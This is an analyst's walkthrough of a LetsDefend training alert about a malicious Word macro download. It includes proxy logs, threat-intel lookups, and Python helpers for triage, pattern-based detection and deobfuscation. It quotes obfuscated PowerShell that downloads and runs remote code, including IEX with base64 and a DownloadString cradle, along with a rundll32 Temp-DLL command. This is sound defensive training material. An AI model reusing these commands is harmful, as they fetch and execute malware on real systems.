4ensiX

I noticed that for the alert I called an FP, I selected FP but the display shows TP.

LetsDefend level 1 alert SOC137 - Malicious File/Script Download Attempt event-id 76

Details

EventID: 76
Event Time: March 14, 2021, 7:15 p.m.
Rule: SOC137 - Malicious File/Script Download Attempt
Level: Security Analyst
Source Address: 172.16.17.37
Source Hostname: NicolasPRD
File Name: INVOICE PACKAGE LINK TO DOWNLOAD.docm
File Hash: f2d0c66b801244c059f636d08a474079
File Size: 16.66 Kb
Device Action: Blocked
Download (Password:infected): f2d0c66b801244c059f636d08a474079.zip

playbook

Define Threat Indicator

Since it was detected as a suspicious download,
Answer: Unknown or unexpected outgoing internet traffic

Check if the malware is quarantined/cleaned

log search

368 Mar, 07, 2021, 01:50 PM Proxy 172.16.17.37 48463 49.51.12.195 443

Request URL: iluuryeqa.info
Request Method: GET
Device Action: Allowed
Process: powershell.exe
Parent Process: wmiprvse.exe
iluuryeqa[.]info

VirusTotal: https://www.virustotal.com/gui/domain/iluuryeqa.info
urlscan: https://urlscan.io/result/052b6119-5114-4d67-ac38-72f1fe46abd9/

49.51.12.195

VirusTotal: https://www.virustotal.com/gui/ip-address/49.51.12.195
urlscan: https://urlscan.io/ip/49.51.12.195

369 Mar, 07, 2021, 01:54 PM Proxy 172.16.17.37 48463 31.214.157.60 80

Request URL: http://ueba6ka.club/images/DVeUkINudhi79z0c_2Bv/hcMjSPUhHNICgDZ2eJc/uPkHWXvBmVjikkuyor3cnx/gi3BCr71LrlRP/OOmOS8_2/Bl7A_2Fjz2BM4Pth4RZbBKn/1OVxs19bE9/6wtE2QLgVO1DP1TCF/SoIEOJUXIYbo/RtuJbNDFWW5/V.avi
Request Method: GET
Device Action: Allowed
Process: iexplore.exe
Parent Process: svchost.exe
ueba6ka[.]club

VirusTotal: https://www.virustotal.com/gui/domain/ueba6ka.club/detection
Is the server currently unregistered?

http[:]//ueba6ka[.]club/images/DVeUkINu...

VirusTotal: https://www.virustotal.com/gui/url/c55325d73f45e6669902fc59af3a60dbaea234a47e12f9a582f7673d018a59e6/detection

370 Mar, 07, 2021, 01:54 PM Proxy 172.16.17.37 48463 49.51.12.195 80

Request URL: http://ueba6ka.club/favicon.ico
Request Method: GET
Device Action: Allowed
Process: iexplore.exe
Parent Process: svchost.exe
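The three proxy entries above can be triaged mechanically. The script below is an added example (not part of the original post or of LetsDefend): it parses the log text in the format shown, flags the two entries an analyst should care about (powershell.exe spawned under wmiprvse.exe, which is what "wmic process call create" produces, and the long randomised path on ueba6ka[.]club) and emits the hosts and IPs in the defanged form used in these notes. The browser baseline and the child/parent pairs are assumptions, not values from the page.

```python
import re

# Proxy log entries as shown in the log search above (header line followed by
# "Key: Value" lines). These are the three entries from this investigation.
PROXY_LOG = """368 Mar, 07, 2021, 01:50 PM Proxy 172.16.17.37 48463 49.51.12.195 443
Request URL: iluuryeqa.info
Request Method: GET
Device Action: Allowed
Process: powershell.exe
Parent Process: wmiprvse.exe

369 Mar, 07, 2021, 01:54 PM Proxy 172.16.17.37 48463 31.214.157.60 80
Request URL: http://ueba6ka.club/images/DVeUkINudhi79z0c_2Bv/hcMjSPUhHNICgDZ2eJc/uPkHWXvBmVjikkuyor3cnx/gi3BCr71LrlRP/OOmOS8_2/Bl7A_2Fjz2BM4Pth4RZbBKn/1OVxs19bE9/6wtE2QLgVO1DP1TCF/SoIEOJUXIYbo/RtuJbNDFWW5/V.avi
Request Method: GET
Device Action: Allowed
Process: iexplore.exe
Parent Process: svchost.exe

370 Mar, 07, 2021, 01:54 PM Proxy 172.16.17.37 48463 49.51.12.195 80
Request URL: http://ueba6ka.club/favicon.ico
Request Method: GET
Device Action: Allowed
Process: iexplore.exe
Parent Process: svchost.exe
"""

HEADER = re.compile(
    r"^(?P<id>\d+)\s+(?P<time>\w{3}, \d{2}, \d{4}, \d{2}:\d{2} [AP]M)\s+Proxy\s+"
    r"(?P<src>[\d.]+)\s+(?P<sport>\d+)\s+(?P<dst>[\d.]+)\s+(?P<dport>\d+)$"
)

# Assumed workstation baseline (not from the page): processes expected to browse.
BROWSERS = {"iexplore.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# Child/parent pairs that mean the child was started through WMI
# ("wmic process call create" runs the new process under wmiprvse.exe).
WMI_SPAWNED = {("powershell.exe", "wmiprvse.exe"), ("cmd.exe", "wmiprvse.exe")}


def parse_proxy_log(text):
    """Split the log into entries and return one dict per entry."""
    entries = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = block.splitlines()
        m = HEADER.match(lines[0].strip())
        if not m:
            continue
        entry = m.groupdict()
        for line in lines[1:]:
            key, _, value = line.partition(":")
            entry[key.strip().lower().replace(" ", "_")] = value.strip()
        entries.append(entry)
    return entries


def split_url(url):
    """Return (host, path) for a request URL with or without a scheme."""
    rest = re.sub(r"^[a-z]+://", "", url, flags=re.I)
    host, sep, path = rest.partition("/")
    return host.lower(), sep + path


def defang(indicator):
    """Write an indicator the way the notes above do: http[:]//ueba6ka[.]club"""
    return indicator.replace("://", "[:]//").replace(".", "[.]")


def triage(entries):
    """Map entry id -> list of reasons for entries that need analyst attention."""
    findings = {}
    for e in entries:
        proc = e.get("process", "").lower()
        parent = e.get("parent_process", "").lower()
        host, path = split_url(e["request_url"])
        reasons = []
        if proc not in BROWSERS:
            reasons.append(f"non-browser process {proc} making a web request to {host}")
        if (proc, parent) in WMI_SPAWNED:
            reasons.append(f"{proc} was spawned via {parent} (WMI process creation)")
        if len(path) > 100 and path.count("/") >= 6:
            reasons.append("long randomised URL path")
        if reasons and e.get("device_action", "").lower() == "allowed":
            reasons.append("the proxy allowed the connection; review the host's other traffic")
        if reasons:
            findings[e["id"]] = reasons
    return findings


def indicators(entries):
    """Defanged hosts and destination IPs for the Add Artifacts step."""
    out = {defang(e["dst"]) for e in entries}
    out |= {defang(split_url(e["request_url"])[0]) for e in entries}
    return sorted(out)
```

Entry 370 (iexplore.exe fetching favicon.ico) produces no finding on its own, which is the point: it only becomes interesting through entry 369 on the same host, so the triage output should be read per source address rather than per line.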

CMD History - EndpointManagement

06.02.2021 12:42: whoami
18.02.2021 09:13: ipconfig
18.02.2021 09:14: dir
19.02.2021 09:15: hostname
19.02.2021 09:16: net user
19.02.2021 09:17: whoami
19.02.2021 11:18: tasklist
07.03.2021 16:12: wMic 'PRocesS' CAll 'cReate' 'PoweRSHElL -eXECuTIonpOli BYpAsS -nop -WIND hidDEN -noniNTeRaCtI iEX ('//'.('ls');'${rW}=[sYstEm.IO.COMPReSSIOn.coMPressIonmoDE]::DEcoMprESS;.('s'+'al') VV iEX;&('ps');&('s'+'al') VVv NEw-objECt;(&('V'+'Vv') systEm.IO.coMpreSsIon.DeFLAteSTReam( [iO.meMOrystREaM][ConVeRT]::FRomBaSE64StRing( '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' )'//'+[StRiNg][CHAR]44 +'//' '${RW})|.('%'){.('V'+'Vv') SYSTeM.IO.strEAmreaDER( '${_} '//'+[StRiNg][CHAR]44 +'//'[tEXT.EnCOdinG]::AsCIi )} ).rEADTOeNd( )|.('VV')'//')'
07.03.2021 16:13: PoweRSHElL -eXECuTIonpOli BYpAsS -nop -WIND hidDEN -noniNTeRaCtI iEX ('//'.('ls');'${rW}=[sYstEm.IO.COMPReSSIOn.coMPressIonmoDE]::DEcoMprESS;.('s'+'al') VV iEX;&('ps');&('s'+'al') VVv NEw-objECt;(&('V'+'Vv') systEm.IO.coMpreSsIon.DeFLAteSTReam( [iO.meMOrystREaM][ConVeRT]::FRomBaSE64StRing( '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' )'//'+[StRiNg][CHAR]44 +'//' '${RW})|.('%'){.('V'+'Vv') SYSTeM.IO.strEAmreaDER( '${_} '//'+[StRiNg][CHAR]44 +'//'[tEXT.EnCOdinG]::AsCIi )} ).rEADTOeNd( )|.('VV')'//')
07.03.2021 16:14: C://Windows//system32//rundll32.exe //s C://Users//Nicolas//AppData//Local//Temp//oo2ofzo5.dll DllRegisterServer
07.03.2021 16:16: cd Nicolas
07.03.2021 16:18: type notes.txt
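The command history above is what the base64 question hinges on, and the suspicious parts of it are recognisable without decoding the payload. The scanner below is an added example, not part of the original post or of LetsDefend: it scores each history line against a small set of patterns (WMI process creation, abbreviated and mixed-case PowerShell switches, IEX, FromBase64String, DeflateStream, rundll32 registering a DLL from a user's Temp directory). The sample lines are constructed from the history above, with the obfuscated PowerShell shortened and the base64 blob, which the page does not reproduce, replaced by a placeholder; the rule weights and threshold are assumptions.

```python
import re

# Constructed command-history lines modelled on the EndpointManagement output above.
# The obfuscated PowerShell is shortened and the base64 blob is replaced by a
# <BASE64_REMOVED> placeholder.
HISTORY = [
    "19.02.2021 09:16: net user",
    "19.02.2021 11:18: tasklist",
    "07.03.2021 16:12: wMic 'PRocesS' CAll 'cReate' 'PoweRSHElL -eXECuTIonpOli BYpAsS "
    "-nop -WIND hidDEN -noniNTeRaCtI iEX (...)'",
    "07.03.2021 16:13: PoweRSHElL -eXECuTIonpOli BYpAsS -nop -WIND hidDEN -noniNTeRaCtI "
    "iEX ([ConVeRT]::FRomBaSE64StRing('<BASE64_REMOVED>') | DeFLAteSTReam ...)",
    "07.03.2021 16:14: C://Windows//system32//rundll32.exe //s "
    "C://Users//Nicolas//AppData//Local//Temp//oo2ofzo5.dll DllRegisterServer",
    "07.03.2021 16:18: type notes.txt",
]

LINE = re.compile(r"^(?P<ts>\d{2}\.\d{2}\.\d{4} \d{2}:\d{2}): (?P<cmd>.*)$")

# (rule name, pattern, weight). PowerShell accepts any unambiguous prefix of a
# parameter name and is case-insensitive, so -eXECuTIonpOli, -exec and -ep all
# mean -ExecutionPolicy; the patterns therefore match a prefix, not the full name.
RULES = [
    ("wmi_process_create", r"\bwmic\W+process\W+call\W+create\b", 4),
    ("ps_execpolicy_bypass", r"-ex\w*\s+bypass\b", 3),
    ("ps_hidden_window", r"-w(?:i\w*)?\s+hidden\b", 2),
    ("ps_noprofile_or_noninteractive", r"-nop\w*\b|-noni\w*\b", 1),
    ("ps_invoke_expression", r"\biex\b|invoke-expression", 3),
    ("ps_base64_payload", r"frombase64string", 3),
    ("ps_compressed_payload", r"deflatestream|gzipstream", 2),
    ("rundll32_temp_dll", r"rundll32\.exe.*[/\\]temp[/\\]+[^\s/\\]+\.dll\b.*dllregisterserver", 4),
    ("discovery_command", r"^(?:whoami|hostname|ipconfig|tasklist|net\s+user)\b", 1),
]
COMPILED = [(name, re.compile(pat, re.I), w) for name, pat, w in RULES]


def score_command(cmd):
    """Return (matched rule names, total weight) for one command line."""
    hits = [name for name, rx, _ in COMPILED if rx.search(cmd)]
    score = sum(w for name, _, w in COMPILED if name in hits)
    return hits, score


def scan_history(lines, threshold=3):
    """Return the history entries whose score reaches the threshold, oldest first."""
    flagged = []
    for raw in lines:
        m = LINE.match(raw)
        if not m:
            continue
        hits, score = score_command(m["cmd"])
        if score >= threshold:
            flagged.append({"time": m["ts"], "cmd": m["cmd"], "rules": hits, "score": score})
    return flagged
```

The single discovery commands (whoami, net user, tasklist) stay below the threshold on their own; they matter here because they precede the 16:12 to 16:14 sequence on the same host, which is the pattern that justifies opening a separate investigation.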

There is a very intriguing base64 string, but I could not confirm that the command was actually executed. Simply decoding it did not tell me what it is.
As far as this alert is concerned,
Answer: Quarantined
although there is plenty that looks suspicious.

Analyze Malware

So, what is the "INVOICE PACKAGE LINK TO DOWNLOAD.docm" that caused this alert?
VirusTotal: https://www.virustotal.com/gui/file/08d4fd5032b8b24072bdff43932630d4200f68404d7e12ffeeda2364c8158873
When the Word document is opened, it runs the following command:

> powershell I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://filetransfer.io/data-package/UR2whuBv/download'))))
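The command uses two cheap obfuscations: backticks inserted into cmdlet names (I`EX, n`e`W`-Obj`E`c`T) and string literals split into 'a'+'b'+'' concatenations. The helper below is an added example of the analyst-side cleanup, not code from the post, from the macro or from any tool: it strips cosmetic backticks (keeping real escapes inside double-quoted strings), joins the concatenations and removes the redundant parentheses, which makes the Net.WebClient DownloadString call and the URL readable. The sample is the command quoted above with the long run of empty ''+'' fragments shortened.

```python
import re

# The macro's command line as quoted above, with the long run of empty ''+''
# fragments shortened to three; the obfuscation techniques are unchanged.
SAMPLE = (
    "powershell I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient')))."
    "(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+'n'+'g'))"
    ".InVokE((('https://filetransfer.io/data-package/UR2whuBv/download'))))"
)


def strip_backticks(cmd):
    """Remove backticks used only to split tokens (I`EX -> IEX).

    The backtick is PowerShell's escape character: inside a double-quoted string
    it is a real escape (`n, `t, `") and is kept; inside single quotes it is a
    literal character and is kept; everywhere else it is cosmetic noise."""
    out, in_single, in_double, i = [], False, False, 0
    while i < len(cmd):
        ch = cmd[i]
        if in_double and ch == "`" and i + 1 < len(cmd):
            out.append(cmd[i:i + 2])  # keep the escape and the character it escapes
            i += 2
            continue
        if ch == "'" and not in_double:
            in_single = not in_single
        elif ch == '"' and not in_single:
            in_double = not in_double
        elif ch == "`" and not in_single:
            i += 1
            continue
        out.append(ch)
        i += 1
    return "".join(out)


CONCAT = re.compile(r"'[^']*'(?:\s*\+\s*'[^']*')+")


def join_concats(cmd):
    """Collapse 'a'+'b'+''+'c' into 'abc'."""
    return CONCAT.sub(
        lambda m: "'" + "".join(re.findall(r"'([^']*)'", m.group(0))) + "'", cmd
    )


def unwrap_parens(cmd):
    """Reduce (('x')) to ('x') repeatedly; a single pair around a literal is kept."""
    pattern = re.compile(r"\(\s*\(\s*('[^']*')\s*\)\s*\)")
    prev = None
    while prev != cmd:
        prev, cmd = cmd, pattern.sub(r"(\1)", cmd)
    return cmd


def deobfuscate(cmd):
    """Apply the three cleanups in order and return the readable command."""
    return unwrap_parens(join_concats(strip_backticks(cmd)))


def extract_urls(cmd):
    """URLs in the cleaned command, for the artifacts list."""
    return re.findall(r"https?://[^\s'\")]+", cmd)
```

After cleanup the sample reads as IEX ((New-Object ('Net.Webclient')).('Downloadstring').Invoke('https://filetransfer.io/...')) apart from letter case, which is what the AnyRun report confirms. The same URL is the artifact recorded below.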

AnyRun: https://app.any.run/tasks/56f42e2a-78ae-4a46-85b6-99abb8fb4f7d

filetransfer.io(104.21.13.139)

VirusTotal: https://www.virustotal.com/gui/domain/filetransfer.io
urlscan.io: https://urlscan.io/result/26e167cf-49f3-474f-bfbe-8debddec4d98/
There are a few suspicious verdicts, but since this is a file transfer service that seems unavoidable; it is presumably used to send malicious files as well. The file that this Word document downloads appears to have already been deleted, so I could not examine it.

Answer: Malicious

Check If Someone Requested the C2

In this case, to begin with,

Device Action Blocked

so as far as the alert is concerned

Answer: Not-Accessed

Add Artifacts

Value                                                      | Type        | Comment
f2d0c66b801244c059f636d08a474079                           | MD5 Hash    | malicious word file
https[:]//filetransfer[.]io/data-package/UR2whuBv/download | URL Address | file sending service

End

close alert event-id 76

This alert itself seems to be fine, but looking at the command history there appears to be a real problem, so in practice a separate investigation would need to start from here.